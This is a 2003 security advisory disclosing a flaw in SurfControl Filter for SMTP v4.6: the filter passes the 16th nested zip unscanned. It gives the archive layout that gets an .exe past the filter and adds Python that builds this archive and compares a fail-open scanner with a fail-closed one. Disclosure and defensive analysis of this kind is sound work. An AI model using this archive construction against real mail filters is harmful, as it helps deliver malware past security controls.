(c)copyright 2003 networkpenetration.com
SurfControl Filter for SMTP v4.6 bypass via nested zips
::::::::::::::::::::::::::::::::::::::::::::::::::::::-
Discovered By Lee Bowyer Lee@networkpenetration.com (5/Jul/03)
SurfControl Filter for SMTP lets SurfControl's content-filtering technology be bolted on to an existing SMTP server.
The rules engine contains a flaw: when an attachment is a .zip that itself contains more than 15 .zip files, the 16th .zip file is not scanned by the filter, so whatever it contains passes through unexamined.
This probably works with other archive/file types and possibly on other SurfControl products.
Bypass
::::::
In order to bypass the filter build a .zip as below:
attach.zip
  - dummy_folder
      - a.zip - junk.txt
      - b.zip - junk.txt
      - c.zip - junk.txt
      - d.zip - junk.txt
      - e.zip - junk.txt
      - f.zip - junk.txt
      - g.zip - junk.txt
      - h.zip - junk.txt
      - i.zip - junk.txt
      - j.zip - junk.txt
      - k.zip - junk.txt
      - m.zip - junk.txt
      - n.zip - junk.txt
      - o.zip - junk.txt
      - p.zip - junk.txt
      - z.zip - sneaky.exe   << passes through!
(The filter processes the files in attach.zip in alphabetical order, so the 15 decoys are named a, b, c, etc. to be sure that z.zip sorts last and is the 16th .zip the filter meets.)
Recommendation
::::::::::::::
Tricky. Realistically a filter cannot open every .zip inside every .zip: it is very easy to build a very small zip that holds tens of thousands of zips, each of which holds many more, and trying to expand such a file would probably DoS the filter anyway.
SurfControl have chosen a threshold of 15 zips, which, while a little low, is understandable. The problem is what happens past the threshold: the unscanned remainder is let through. Perhaps some sort of 'excessive archiving' rule is the answer, where an attachment that exceeds the nesting threshold is itself blocked or quarantined rather than passed on unscanned.
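As an added example (not part of the original advisory and not SurfControl's code), the following Python builds attach.zip in memory exactly as the Bypass section lays it out, then runs two toy scanners over it: naive_scan models the flawed behaviour, silently skipping any nested .zip once 15 have been opened, and strict_scan applies the 'excessive archiving' rule suggested in the Recommendation, rejecting the attachment when the threshold is exceeded. The scanner logic, the assumption that the threshold counts nested zips opened across the whole attachment, the default of 15, the .exe block list and all function names are assumptions made for illustration.

```python
import io
import zipfile

# Names from the advisory: 15 decoy zips (a..k, m..p) plus z.zip, which sorts last.
DECOY_NAMES = [c + ".zip" for c in "abcdefghijkmnop"]
PAYLOAD_NAME = "z.zip"
BLOCKED_EXTENSIONS = (".exe",)   # assumed block list for the toy scanners


def make_zip(members):
    """Return the bytes of a zip archive holding the {name: bytes} members."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_attachment(payload_name="sneaky.exe", payload=b"MZ constructed payload"):
    """Build attach.zip as laid out in the Bypass section (payload bytes are constructed)."""
    members = {"dummy_folder/" + n: make_zip({"junk.txt": b"junk\n"})
               for n in DECOY_NAMES}
    members["dummy_folder/" + PAYLOAD_NAME] = make_zip({payload_name: payload})
    return make_zip(members)


def _walk(data, budget, skipped, prefix=""):
    """Yield (path, bytes) for every non-archive file reached inside `data`.

    `budget` is a one-element list: how many more nested zips may be opened.
    Nested zips met after it is exhausted are appended to `skipped` and NOT
    opened.  Members are visited in sorted order, as the advisory says the
    filter does.  The budget also bounds recursion depth, so a zip-in-zip
    bomb cannot make the walker recurse without limit."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in sorted(zf.namelist()):
            if name.endswith("/"):          # directory entry, nothing to scan
                continue
            path = prefix + name
            blob = zf.read(name)
            if name.lower().endswith(".zip"):
                if budget[0] <= 0:
                    skipped.append(path)
                    continue
                budget[0] -= 1
                yield from _walk(blob, budget, skipped, path + "/")
            else:
                yield path, blob


def _is_blocked(path):
    return path.lower().endswith(BLOCKED_EXTENSIONS)


def naive_scan(attachment, max_nested=15):
    """Model of the flawed rules engine: once `max_nested` nested zips have
    been opened, the rest are silently skipped and the mail is allowed
    (fail-open).  Returns (verdict, list of unscanned nested zips)."""
    skipped = []
    for path, _ in _walk(attachment, [max_nested], skipped):
        if _is_blocked(path):
            return "blocked: " + path, skipped
    return "allowed", skipped


def strict_scan(attachment, max_nested=15):
    """'Excessive archiving' rule: same threshold, but exhausting it is itself
    grounds to reject the attachment (fail-closed).  Returns the verdict."""
    skipped = []
    for path, _ in _walk(attachment, [max_nested], skipped):
        if _is_blocked(path):
            return "blocked: " + path
    if skipped:
        return "blocked: excessive archiving, %d nested zip(s) unscanned" % len(skipped)
    return "allowed"


if __name__ == "__main__":
    attach = build_attachment()
    print(naive_scan(attach))        # ('allowed', ['dummy_folder/z.zip'])
    print(naive_scan(attach, 16))    # ('blocked: dummy_folder/z.zip/sneaky.exe', [])
    print(strict_scan(attach))       # blocked: excessive archiving, 1 nested zip(s) unscanned
```

Raising the threshold only moves the goalposts (naive_scan with 16 catches this particular file, and a 17th decoy defeats it again); the design point is that running out of scanning budget must produce a block or quarantine, never an allow.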
Network Penetration
www.networkpenetration.com
Copyright (c) 2003 Lee Bowyer
Lee@networkpenetration.com